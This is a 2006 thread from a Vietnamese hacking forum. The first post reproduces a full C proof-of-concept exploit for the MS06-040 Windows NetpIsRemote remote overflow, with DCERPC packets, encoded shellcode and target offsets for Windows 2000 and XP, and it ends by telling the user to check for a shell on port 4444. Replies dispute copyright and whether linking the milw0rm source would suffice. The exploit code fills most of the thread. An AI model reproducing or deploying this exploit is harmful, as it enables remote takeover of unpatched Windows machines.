banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits MS Windows NetpIsRemote() Remote Overflow (MS06-040)  XML
  [Question]   MS Windows NetpIsRemote() Remote Overflow (MS06-040) 30/08/2006 00:16:29 (+0700) | #1 | 19001
[Avatar]
LeonHart
HVA Friend

Joined: 10/01/2003 11:11:52
Messages: 215
Location: Secret
Offline
[Profile] [PM]
Rated as : Critical
Code:
/*
 * MS06-040 Remote Code Execution Proof of Concept
 *
 * Ported by ub3r st4r aka iRP
 * ---------------------------------------------------------------------
 * Tested Against:
 *  Windows XP SP1
 *  Windows 2000 SP4
 *
 * Systems Affected:
 *  Microsoft Windows 2000 SP0-SP4
 *  Microsoft Windows XP SP0-SP1
 *  Microsoft Windows NT 4.0
 * ---------------------------------------------------------------------
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 * PRIVATE v.0.2 (08-27-06)
 */

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
      
"x05x00x0Bx03x10x00x00x00x48x00x00x00x00x00x00x00"
      
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
      
"xC8x4Fx32x4Bx70x16xD3x01x12x78x5Ax47xBFx6ExE1x88"
      
"x03x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
       "x2Bx10x48x60x02x00x00x00";

// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
      
"x05x00x00x03x10x00x00x00x30x08x00x00x00x00x00x00"
      
"x18x08x00x00x00x00x1fx00xffxffxffxffx01x00x00x00"
       "x00x00x00x00x01x00x00x00x00x00x00x00";

       // path ...

unsigned char DCERPC_Request_RPC_Service_[] =
      
"xfax00x00x00x02x00x00x00x00x00x00x00x02x00x00x00"
       "x00x00x00x00xfax00x00x00x00x00x00x00";

unsigned char sc[] =
      
"x6ax51x59xd9xeexd9x74x24xf4x5bx81x73x13xa8x97x90"
      
"x88x83xebxfcxe2xf4x29x53x6fx67x57x68xd4x74xc2x7c"
      
"xddx60x51x68x6fx77xc8x1cxfcxacx8cx1cxd5xb4x23xeb"
      
"x95xf0xa9x78x1bxc7xb0x1cxcfxa8xa9x7cxd9x03x9cx1c"
      
"x91x66x99x57x09x24x2cx57xe4x8fx69x5dx9dx89x6ax7c"
      
"x64xb3xfcxb3xb8xfdx4dx1cxcfxacxa9x7cxf6x03xa4xdc"
      
"x1bxd7xb4x96x7bx8bx84x1cx19xe4x8cx8bxf1x4bx99x4c"
      
"xf4x03xebxa7x1bxc8xa4x1cxe0x94x05x1cxd0x80xf6xff"
      
"x1exc6xa6x7bxc0x77x7exf1xc3xeexc0xa4xa2xe0xdfxe4"
      
"xa2xd7xfcx68x40xe0x63x7ax6cxb3xf8x68x46xd7x21x72"
      
"xf6x09x45x9fx92xddxc2x95x6fx58xc0x4ex99x7dx05xc0"
      
"x6fx5exfbxc4xc3xdbxfbxd4xc3xcbxfbx68x40xeexc0x86"
      
"xccxeexfbx1ex71x1dxc0x33x8axf8x6fxc0x6fx5exc2x87"
      
"xc1xddx57x47xf8x2cx05xb9x79xdfx57x41xc3xddx57x47"
      
"xf8x6dxe1x11xd9xdfx57x41xc0xdcxfcxc2x6fx58x3bxff"
      
"x77xf1x6exeexc7x77x7exc2x6fx58xcexfdxf4xeexc0xf4"
      
"xfdx01x4dxfdxc0xd1x81x5bx19x6fxc2xd3x19x6ax99x57"
      
"x63x22x56xd5xbdx76xeaxbbx03x05xd2xafx3bx23x03xff"
      
"xe2x76x1bx81x6fxfdxecx68x46xd3xffxc5xc1xd9xf9xfd"
      
"x91xd9xf9xc2xc1x77x78xffx3dx51xadx59xc3x77x7exfd"
      
"x6fx77x9fx68x40x03xffx6bx13x4cxccx68x46xdax57x47"
       "xf8x67x66x77xf0xdbx57x41x6fx58";

int main(int argc, char* argv[])
{
       HANDLE hFile;
       NETRESOURCE nr;

       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];

       unsigned int i;

       unsigned char szInBuf[4096];
       unsigned long dwRead, nWritten;

       unsigned char szReqBuf[2096];

       if (argc < 3){
               printf("[-] Usage: ms06040poc <host>
[target]n");
               printf("t1 - Windows 2000 SP0-SP4n");
               printf("t2 - Windows XP SP0-SP1n");
               return -1;
       }

       memset(szReqBuf, 0, sizeof(szReqBuf));

       if (atoi(argv[2]) == 1) {
               unsigned char szBuff[1064];

               // build payload buffer
               memset(szBuff, 'x90', 1000);
               memcpy(szBuff+630, sc, sizeof(sc));

               for(i=1000; i<1064; i+=4) {
                       memcpy(szBuff+i, "x04x08x02x00", 4);
               }

               // build request buffer
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x15x02x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x15x02x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+1120, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
               memcpy(szReqBuf+1140 , "xebx02", 2);
       }
       if (atoi(argv[2]) == 2) {
               unsigned char szBuff[708];

               memset(szBuff, 'x90', 612); /* size of shellcode */
               memcpy(szBuff, sc, sizeof(sc));

               memcpy(szBuff+612, "x0ax08x02x00", 4);
               memset(szBuff+616, 'A', 8); // 8 bytes padding
               memcpy(szBuff+624, "x04x08x02x00", 4);
               memset(szBuff+628, 'x90', 32);
               memcpy(szBuff+660, "x04x08x02x00", 4);
               memset(szBuff+664, 'B', 8); // 8 bytes padding
               memcpy(szBuff+672, "x04x08x02x00", 4);
               memset(szBuff+676, 'x90', 32);

               // build request buffer
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x63x01x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x63x01x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+764, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
       }

       printf("[+] Connecting to %s ... n", argv[1]);

       _snprintf(szRemoteName, sizeof(szRemoteName),
"\\%s\ipc$", argv[1]);
       nr.dwType = RESOURCETYPE_ANY;
       nr.lpLocalName = NULL;
       nr.lpProvider = NULL;
       nr.lpRemoteName = szRemoteName;
       if (WNetAddConnection2(&nr, "", "", 0) !=
NO_ERROR) {
               printf("[-] Failed to connect to host !n");
               return -1;
       }

       _snprintf(szPipePath, sizeof(szPipePath),
"\\%s\pipe\browser", argv[1]);
       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);

       if (hFile == INVALID_HANDLE_VALUE) {
               printf("[-] Failed to open named pipe !n");
               return -1;
       }

       printf("[+] Binding to RPC interface ... n");
       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service,
sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL)
== 0) {
               printf("[-] Failed to bind to interface !n");
               CloseHandle(hFile);
               return -1;
       }

       printf("[+] Sending RPC request ... n");
       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
               printf("[-] Unable to transmit RPC request
!n");
               CloseHandle(hFile);
               return -1;
       }

       printf("[+] Now check for shell on %s:4444 !n",
argv[1]);

       return 0;
}
[Up] [Print Copy]
  [Question]   MS Windows NetpIsRemote() Remote Overflow (MS06-040) 31/08/2006 10:04:17 (+0700) | #2 | 19410
PHUCDOAN
Member

[Minus]    0    [Plus]
Joined: 04/08/2006 23:50:25
Messages: 33
Offline
[Profile] [PM]
Copyright!!!!!!!!!
Phúc còn nhớ lúc trước pác BigBall_Hacker post 1 bài tương tự nhưng nhận được sự phản ứng kịch liệt từ MOD (tạo rác cho forum) thế nhưng mời anh Conmale xem lại bài này có khác gì không?
Nếu có thể chỉ cần vậy thôi: http://milw0rm.com/exploits/2265 mọi người có thể tìm đến mà
[Up] [Print Copy]
  [Question]   MS Windows NetpIsRemote() Remote Overflow (MS06-040) 31/08/2006 13:34:50 (+0700) | #3 | 19453
[Avatar]
havythoai
HVA Friend

Joined: 05/04/2004 22:59:39
Messages: 562
Offline
[Profile] [PM] [WWW]

PHUCDOAN wrote:
Copyright!!!!!!!!!
Phúc còn nhớ lúc trước pác BigBall_Hacker post 1 bài tương tự nhưng nhận được sự phản ứng kịch liệt từ MOD (tạo rác cho forum) thế nhưng mời anh Conmale xem lại bài này có khác gì không?
Nếu có thể chỉ cần vậy thôi: http://milw0rm.com/exploits/2265 mọi người có thể tìm đến mà 

Tớ nghĩ là dòng màu cam cũng đủ để là bản quyền !

nếu chỉ cần post link thì người đọc mất công nhấp thêm 1 click nữa rồi mới xem được ...

nói chung ! Tốt nhất vửa post nội dung , vừa post link smilie)
/*
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|